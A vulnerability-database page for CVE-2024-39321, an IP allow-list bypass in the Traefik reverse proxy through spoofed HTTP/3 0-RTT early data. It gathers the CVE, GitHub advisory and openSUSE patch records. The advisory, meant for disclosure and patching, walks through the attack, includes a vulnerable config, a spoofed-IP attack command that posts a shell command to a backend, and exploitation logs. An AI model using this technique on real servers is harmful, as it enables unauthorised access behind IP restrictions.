cvelistv5 - cve-2024-39321

CVE-2024-39321 (GCVE-0-2024-39321)

Vulnerability from cvelistv5

Published

2024-07-05 17:32

Modified

2024-08-02 04:19

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Summary

Traefik is an HTTP reverse proxy and load balancer. Versions prior to 2.11.6, 3.0.4, and 3.1.0-rc3 have a vulnerability that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. Versions 2.11.6, 3.0.4, and 3.1.0-rc3 contain a patch for this issue. No known workarounds are available.

References

►

URL

	Vendor	Product	Version
	traefik	traefik	Version: < 2.11.6 Version: >= 3.0.0-beta3, < 3.0.4 Version: >= 3.1.0-rc1, < 3.1.0-rc3

ghsa-gxrv-wf35-62w9

Vulnerability from github

Published

2024-07-05 20:13

Modified

2024-07-09 21:58

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

Summary

Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes

Details

Impact

There is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.6
https://github.com/traefik/traefik/releases/tag/v3.0.4
https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3

Workarounds

No workaround.

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. ### Details HTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client's IP address is validated. The initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address. First, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection. In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists. A prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place). A caveat is that attackers are not able to receive the server's response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path's MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6). ### Impact IP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled. ### Mitigation * Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. See RFC 8470 Section 3 for more information. * Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client's IP address is validated when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. Additionally, it is recommended to implement RFC 8470 and set the `Early-Data: 1` header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client's IP in `X-Forwarded-For` headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer. ### Proof of Concept Traefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7. ```yaml # /etc/traefik/traefik.yml entryPoints: websecure: address: ":4439" http3: {} asDefault: true providers: file: filename: /etc/traefik/provider.yml log: level: DEBUG ``` ```yaml # /etc/traefik/provider.yml http: routers: default: rule: "PathPrefix(`/`)" tls: {} middlewares: - ipfilter service: backend middlewares: ipfilter: ipAllowList: sourceRange: - "1.3.3.7/32" services: backend: loadBalancer: servers: - url: "http://127.0.0.1:8000" ``` By performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application's logic. Please find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs following request: ``` python3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d "cmd=echo%20worked>>/tmp/spoofed" -H "X-Header: test" --spoofed-ip=1.3.3.7 ``` Note: We use a custom python script because, `curl` does not support QUIC 0-RTT requests and session resumtion yet. [proof-of-concept.zip](https://github.com/user-attachments/files/16044048/proof-of-concept.zip) Here are logs of a successful exploitation in the attached docker compose setup: ``` docker compose up # Traefik startup logs h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 > Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3 h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 > Static configuration loaded [json] staticConfiguration={"entryPoints":{"websecure":{"address":":4439","asDefault":true,"forwardedHeaders":{},"http":{},"http2":{"maxConcurrentStreams":250},"http3":{},"transport":{"lifeCycle":{"graceTimeOut":"10s"},"respondingTimeouts":{"idleTimeout":"3m0s","readTimeout":"1m0s"}},"udp":{"timeout":"3s"}}},"global":{"checkNewVersion":true},"log":{"format":"common","level":"DEBUG"},"providers":{"file":{"filename":"/etc/traefik/provider.yml","watch":true},"providersThrottleDuration":"2s"},"serversTransport":{"maxIdleConnsPerHost":200},"tcpServersTransport":{"dialKeepAlive":"15s","dialTimeout":"30s"}} h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 > h3_traefik-1 | Stats collection is disabled. h3_traefik-1 | Help us improve Traefik by turning this feature on :) h3_traefik-1 | More details on: https://doc.traefik.io/traefik/contributing/data-collection/ h3_traefik-1 | h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 > Starting provider aggregator aggregator.ProviderAggregator h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 > Starting TCP Server entryPointName=websecure h3_traefik-1 | 2024-06-29T11:52:58Z DBG log/log.go:245 > 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details. h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *file.Provider h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *file.Provider provider configuration config={"filename":"/etc/traefik/provider.yml","watch":true} h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 > add watcher on: /etc/traefik/provider.yml h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *traefik.Provider h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *traefik.Provider provider configuration config={} h3_traefik-1 | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 > Starting provider *acme.ChallengeTLSALPN h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 > *acme.ChallengeTLSALPN provider configuration config={} h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"middlewares":{"ipfilter":{"ipAllowList":{"sourceRange":["1.3.3.7/32"]}}},"routers":{"default":{"middlewares":["ipfilter"],"rule":"PathPrefix(`/`)","service":"backend","tls":{}}},"services":{"backend":{"loadBalancer":{"passHostHeader":true,"responseForwarding":{"flushInterval":"100ms"},"servers":[{"url":"http://127.0.0.1:8000"}]}}}},"tcp":{},"tls":{},"udp":{}} providerName=file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 > Configuration received config={"http":{"serversTransports":{"default":{"maxIdleConnsPerHost":200}},"services":{"noop":{}}},"tcp":{"serversTransports":{"default":{"dialKeepAlive":"15s","dialTimeout":"30s"}}},"tls":{},"udp":{}} providerName=internal h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 > No entryPoint defined for this router, using the default one(s) instead entryPointName=["websecure"] routerName=default h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 > No default certificate, fallback to the internal generated certificate tlsStoreName=default h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 > Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 > Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000 h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 > Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 > Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 > Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file h3_traefik-1 | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 > Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover # Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket attack-ipspoofing-1 | INFO:client:Initially connecting to server to get a session ticket attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3 attack-ipspoofing-1 | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason ) attack-ipspoofing-1 | INFO:client:Initial connection done # Traefik accepts the HTTP/3 connection and issues as session ticket h3_traefik-1 | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 > Serving default certificate for request: "" # Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP attack-ipspoofing-1 | INFO:client:Building 0-RTT QUIC packet attack-ipspoofing-1 | INFO:client:Setting up iptables rule for source IP spoofing attack-ipspoofing-1 | INFO:client:Sending 0-RTT packet # Traefik accepts and forwards the request to the backend service, bypassing the IP allow list h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 > Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister h3_traefik-1 | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 > Service selected by WRR: 754e0da3b063885a # Backend service receives and processes the request backend-1 | INFO:root:Request: {"ip": "1.3.3.7", "method": "POST", "path": "/cmd", "data": "cmd=echo%20worked>>/tmp/spoofed", "headers": {"Host": "127.0.0.1:4439", "Content-Length": "31", "Content-Type": "application/x-www-form-urlencoded", "X-Forwarded-For": "1.3.3.7", "X-Forwarded-Host": "127.0.0.1:4439", "X-Forwarded-Port": "4439", "X-Forwarded-Proto": "https", "X-Forwarded-Server": "work", "X-Header": "test", "X-Real-Ip": "1.3.3.7", "Accept-Encoding": "gzip"}} backend-1 | INFO:root:Executing command: echo worked>>/tmp/spoofed ```

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0-beta3"
            },
            {
              "fixed": "3.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0-rc1"
            },
            {
              "fixed": "3.1.0-rc3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-39321"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-05T20:13:50Z",
    "nvd_published_at": "2024-07-05T18:15:32Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThere is a vulnerability in Traefik that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.\n\n### Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.6\n- https://github.com/traefik/traefik/releases/tag/v3.0.4\n- https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3\n\n### Workarounds\n\nNo workaround.\n\n### For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n### Summary\nBypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses.\n\n\n### Details\nHTTP/3 supports sending HTTP requests as early data during QUIC 0-RTT handshakes to reduce RTT overhead for connection resumptions. Early data is sent and received before the handshake is completed and the client\u0027s IP address is validated.\nThe initial packet containing the QUIC 0-RTT handshake information and the early data HTTP request are sent as a single UDP datagram. Due to UDP being used by QUIC, the source IP address can be spoofed. When HTTP/3 servers process early data requests, the application layer only sees the unvalidated - possibly spoofed - IP address.\n\nFirst, attackers have to obtain a session ticket from the HTTP/3 server. For that, attackers have to establish an HTTP/3 connection to the server - using their real IP address - and wait for the server to send a session ticket. Note that attackers do not have to send an actual HTTP request over the established connection. After obtaining the session ticket, the attacker can close the connection. In the second step, attackers need to prepare a UDP datagram containing a QUIC initial packet with a TLS ClientHello and the session ticket, a QUIC 0-RTT packet with early data encrypted with the pre-shared key from the session ticket, and an HTTP/3 request (open request stream, HEADERS frame, optionally DATA frame). This prepared UDP datagram can then be sent to the server with an arbitrarily spoofed source IP address in the IP packet header. When processing the HTTP request, the server trusts the spoofed IP address, which can be used to bypass IP-allow/block-lists.\n\nA prerequisite for this attack to succeed is that HTTP/3 servers have implemented and enabled 0-RTT early data for HTTP/3 requests (and no mitigations are in place). A caveat is that attackers are not able to receive the server\u0027s response because the response is sent to the spoofed source IP address, making it a blind attack. Another limitation is that the request has to fit in a single UDP datagram, whose size is limited by the network path\u0027s MTU (minus some bytes for headers of encapsulating protocols such as HTTP/3, QUIC, UDP, IPv4/IPv6).\n\n\n### Impact\nIP allow-lists can be bypassed. Early data in QUIC 0-RTT handshakes is enabled when HTTP/3 support is enabled.\n\n### Mitigation\n* Consider responding with HTTP status code 425 Too Early when 0-RTT early data requests match `ipAllowList.sourceRange` middleware. See RFC 8470 Section 3 for more information.\n* Alternatively, delay processing of 0-RTT early data requests until the handshake is completed and the client\u0027s IP address is validated when 0-RTT early data requests match `ipAllowList.sourceRange` middleware.\n\nAdditionally, it is recommended to implement RFC 8470 and set the `Early-Data: 1` header when forwarding early data requests to backend services. Currently, applications are not able to distinguish between 0-RTT early data requests and regular requests. When applications use the client\u0027s IP in `X-Forwarded-For` headers (e.g. for rate limiting), they are not able to detect potential IP spoofing on the application layer.\n\n\n### Proof of Concept\nTraefik is used as a HTTP/3 reverse proxy for a backend application. An IP allow list is configured to only allow access from the IP address 1.3.3.7.\n\n```yaml\n# /etc/traefik/traefik.yml\nentryPoints:\n  websecure:\n    address: \":4439\"\n    http3: {}\n    asDefault: true\n\nproviders:\n  file:\n    filename: /etc/traefik/provider.yml\n\nlog:\n  level: DEBUG\n```\n\n```yaml\n# /etc/traefik/provider.yml\nhttp:\n  routers:\n    default:\n      rule: \"PathPrefix(`/`)\"\n      tls: {}\n      middlewares:\n        - ipfilter\n      service: backend\n  \n  middlewares:\n    ipfilter:\n      ipAllowList:\n        sourceRange:\n          - \"1.3.3.7/32\"\n\n  services:\n    backend:\n      loadBalancer:\n        servers:\n          - url: \"http://127.0.0.1:8000\"\n```\n\n\nBy performing the steps described above, attackers are able to bypass the IP allow list and send requests to the backend application. The security impact depends on the application\u0027s logic.\n\nPlease find attached a proof-of-concept docker-compose setup to demonstrate the vulnerability. It consists of a traefik reverse proxy, a backend application, and an attacker container. The attack script performs following request:\n```\npython3 http3_ip_spoofing.py https://127.0.0.1:4439/cmd -X POST -d \"cmd=echo%20worked\u003e\u003e/tmp/spoofed\" -H \"X-Header: test\" --spoofed-ip=1.3.3.7\n```\nNote: We use a custom python script because, `curl` does not support QUIC 0-RTT requests and session resumtion yet.\n\n[proof-of-concept.zip](https://github.com/user-attachments/files/16044048/proof-of-concept.zip)\n\n\nHere are logs of a successful exploitation in the attached docker compose setup:\n```\ndocker compose up\n\n# Traefik startup logs\nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:100 \u003e Traefik version 3.0.3 built on 2024-06-18T14:31:20Z version=3.0.3\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/cmd/traefik/traefik.go:107 \u003e Static configuration loaded [json] staticConfiguration={\"entryPoints\":{\"websecure\":{\"address\":\":4439\",\"asDefault\":true,\"forwardedHeaders\":{},\"http\":{},\"http2\":{\"maxConcurrentStreams\":250},\"http3\":{},\"transport\":{\"lifeCycle\":{\"graceTimeOut\":\"10s\"},\"respondingTimeouts\":{\"idleTimeout\":\"3m0s\",\"readTimeout\":\"1m0s\"}},\"udp\":{\"timeout\":\"3s\"}}},\"global\":{\"checkNewVersion\":true},\"log\":{\"format\":\"common\",\"level\":\"DEBUG\"},\"providers\":{\"file\":{\"filename\":\"/etc/traefik/provider.yml\",\"watch\":true},\"providersThrottleDuration\":\"2s\"},\"serversTransport\":{\"maxIdleConnsPerHost\":200},\"tcpServersTransport\":{\"dialKeepAlive\":\"15s\",\"dialTimeout\":\"30s\"}}\nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/cmd/traefik/traefik.go:605 \u003e \nh3_traefik-1         | Stats collection is disabled.\nh3_traefik-1         | Help us improve Traefik by turning this feature on :)\nh3_traefik-1         | More details on: https://doc.traefik.io/traefik/contributing/data-collection/\nh3_traefik-1         | \nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:73 \u003e Starting provider aggregator aggregator.ProviderAggregator\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/server_entrypoint_tcp.go:220 \u003e Starting TCP Server entryPointName=websecure\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG log/log.go:245 \u003e 2024/06/29 11:52:58 sys_conn.go:36: failed to sufficiently increase receive buffer size (was: 208 kiB, wanted: 2048 kiB, got: 416 kiB). See https://github.com/quic-go/quic-go/wiki/UDP-Buffer-Sizes for details.\nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 \u003e Starting provider *file.Provider\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 \u003e *file.Provider provider configuration config={\"filename\":\"/etc/traefik/provider.yml\",\"watch\":true}\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 \u003e add watcher on: /etc/traefik\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/file/file.go:122 \u003e add watcher on: /etc/traefik/provider.yml\nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 \u003e Starting provider *traefik.Provider\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 \u003e *traefik.Provider provider configuration config={}\nh3_traefik-1         | 2024-06-29T11:52:58Z INF github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:202 \u003e Starting provider *acme.ChallengeTLSALPN\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/provider/aggregator/aggregator.go:203 \u003e *acme.ChallengeTLSALPN provider configuration config={}\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 \u003e Configuration received config={\"http\":{\"middlewares\":{\"ipfilter\":{\"ipAllowList\":{\"sourceRange\":[\"1.3.3.7/32\"]}}},\"routers\":{\"default\":{\"middlewares\":[\"ipfilter\"],\"rule\":\"PathPrefix(`/`)\",\"service\":\"backend\",\"tls\":{}}},\"services\":{\"backend\":{\"loadBalancer\":{\"passHostHeader\":true,\"responseForwarding\":{\"flushInterval\":\"100ms\"},\"servers\":[{\"url\":\"http://127.0.0.1:8000\"}]}}}},\"tcp\":{},\"tls\":{},\"udp\":{}} providerName=file\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/configurationwatcher.go:227 \u003e Configuration received config={\"http\":{\"serversTransports\":{\"default\":{\"maxIdleConnsPerHost\":200}},\"services\":{\"noop\":{}}},\"tcp\":{\"serversTransports\":{\"default\":{\"dialKeepAlive\":\"15s\",\"dialTimeout\":\"30s\"}}},\"tls\":{},\"udp\":{}} providerName=internal\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/aggregator.go:51 \u003e No entryPoint defined for this router, using the default one(s) instead entryPointName=[\"websecure\"] routerName=default\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:321 \u003e No default certificate, fallback to the internal generated certificate tlsStoreName=default\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:259 \u003e Creating load-balancer entryPointName=websecure routerName=default@file serviceName=backend@file\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/server/service/service.go:301 \u003e Creating server entryPointName=websecure routerName=default@file serverName=754e0da3b063885a serviceName=backend@file target=http://127.0.0.1:8000\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:33 \u003e Creating middleware entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:57 \u003e Setting up IPAllowLister with sourceRange: [1.3.3.7/32] entryPointName=websecure middlewareName=ipfilter@file middlewareType=IPAllowLister routerName=default@file\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/observability/middleware.go:33 \u003e Adding tracing to middleware entryPointName=websecure middlewareName=ipfilter@file routerName=default@file\nh3_traefik-1         | 2024-06-29T11:52:58Z DBG github.com/traefik/traefik/v3/pkg/middlewares/recovery/recovery.go:22 \u003e Creating middleware entryPointName=websecure middlewareName=traefik-internal-recovery middlewareType=Recover\n\n# Attack script establishes an HTTP/3 connection to traefik to obtain a session ticket\nattack-ipspoofing-1  | INFO:client:Initially connecting to server to get a session ticket\nattack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] ALPN negotiated protocol h3\nattack-ipspoofing-1  | INFO:quic:[e29b2e2fd9a76162] Connection close sent (code 0x0, reason )\nattack-ipspoofing-1  | INFO:client:Initial connection done\n\n# Traefik accepts the HTTP/3 connection and issues as session ticket \nh3_traefik-1         | 2024-06-29T11:53:03Z DBG github.com/traefik/traefik/v3/pkg/tls/tlsmanager.go:228 \u003e Serving default certificate for request: \"\"\n\n# Attack script sends a 0-RTT early data request in a UDP datagram with a spoofed source IP\nattack-ipspoofing-1  | INFO:client:Building 0-RTT QUIC packet\nattack-ipspoofing-1  | INFO:client:Setting up iptables rule for source IP spoofing\nattack-ipspoofing-1  | INFO:client:Sending 0-RTT packet\n\n# Traefik accepts and forwards the request to the backend service, bypassing the IP allow list\nh3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/middlewares/ipallowlist/ip_allowlist.go:85 \u003e Accepting IP 1.3.3.7 middlewareName=ipfilter@file middlewareType=IPAllowLister\nh3_traefik-1         | 2024-06-29T11:53:05Z DBG github.com/traefik/traefik/v3/pkg/server/service/loadbalancer/wrr/wrr.go:196 \u003e Service selected by WRR: 754e0da3b063885a\n\n# Backend service receives and processes the request\nbackend-1            | INFO:root:Request: {\"ip\": \"1.3.3.7\", \"method\": \"POST\", \"path\": \"/cmd\", \"data\": \"cmd=echo%20worked\u003e\u003e/tmp/spoofed\", \"headers\": {\"Host\": \"127.0.0.1:4439\", \"Content-Length\": \"31\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"X-Forwarded-For\": \"1.3.3.7\", \"X-Forwarded-Host\": \"127.0.0.1:4439\", \"X-Forwarded-Port\": \"4439\", \"X-Forwarded-Proto\": \"https\", \"X-Forwarded-Server\": \"work\", \"X-Header\": \"test\", \"X-Real-Ip\": \"1.3.3.7\", \"Accept-Encoding\": \"gzip\"}}\nbackend-1            | INFO:root:Executing command: echo worked\u003e\u003e/tmp/spoofed\n```\n\u003c/details\u003e",
  "id": "GHSA-gxrv-wf35-62w9",
  "modified": "2024-07-09T21:58:14Z",
  "published": "2024-07-05T20:13:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39321"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.0.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bypassing IP allow-lists in traefik via HTTP/3 early data requests in QUIC 0-RTT handshakes"
}

opensuse-su-2024:14182-1

Vulnerability from csaf_opensuse

Published

2024-07-12 00:00

Modified

2024-07-12 00:00

Summary

traefik2-2.11.6-2.1 on GA media

Notes

Title of the patch

traefik2-2.11.6-2.1 on GA media

Description of the patch

These are all security issues fixed in the traefik2-2.11.6-2.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2024-14182

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "traefik2-2.11.6-2.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the traefik2-2.11.6-2.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-14182",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
